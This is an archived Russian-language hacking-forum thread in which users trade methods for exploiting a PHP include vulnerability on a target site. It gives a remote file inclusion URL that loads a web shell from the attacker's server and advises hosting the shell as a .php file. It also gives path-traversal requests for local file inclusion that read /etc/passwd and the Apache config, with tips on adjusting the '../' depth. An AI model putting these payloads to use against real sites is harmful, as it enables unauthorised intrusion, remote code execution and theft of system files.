PDA

Просмотр полной версии : инклуд


Foblas
13.03.2006, 06:36
вот чтоу меня получилось:
запрос допустим такой- http://www.target.com/index1.php?page=http://mysite.com/shell.txt

в браузере вижу - Warning: Failed opening './http://mypage.org/shell.txt' for inclusion (include_path='.:/usr/share/pear:/home/httpd/phplib') in /home/target/public_html/index1.php on line 63

./ - возможно ли как-то обойти, чтобы заинклудить файл/скрипт/что_нибудь_ещё?

Не гнобите сильно, если это проскакивает тут в стотысячный раз )

ArdeOS
13.03.2006, 18:08
шелл нужно заливать на сайт с расширением php (!) А не с тхт - он выполнятся должен, а серевер на котором возможно есть инклуд, воспринимает его как обычный текстовик.
И еще на конце не нужно писать расширение пхп - http://mypage.com/shell если не катит то можно попробыва добавить его - в разных системах по разному ;)

Trinux
14.03.2006, 18:25
Нет, ./ не обойти. В твоем случае можно выполнять лишь локальный инклуд

limpompo
14.03.2006, 18:38
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf

Trinux
14.03.2006, 19:21
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf
опять же непонятно число уровней до корневой директории с корня веб-сервака. т.е. количество "../" менять постепенно вверх.

ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?

tclover
14.03.2006, 19:23
ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый?

Ночной дозор. Всем выйти из сумрака! :)

KEZ
14.03.2006, 19:23
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd


никогда не понимал смысл вот этого
наверное статьи аля 80х, где цель всегда passwd, оставили свой след...

Foblas
14.03.2006, 23:52
попробуй
__http://www.target.com/index1.php?page=../../../etc/passwd

Если пройдёт то
__http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf


Пробовал впервую очередь, всё равно добавляет это злобное ./ (

m0nzt3r
14.03.2006, 23:56
Trinux он же и в МОА ив АМА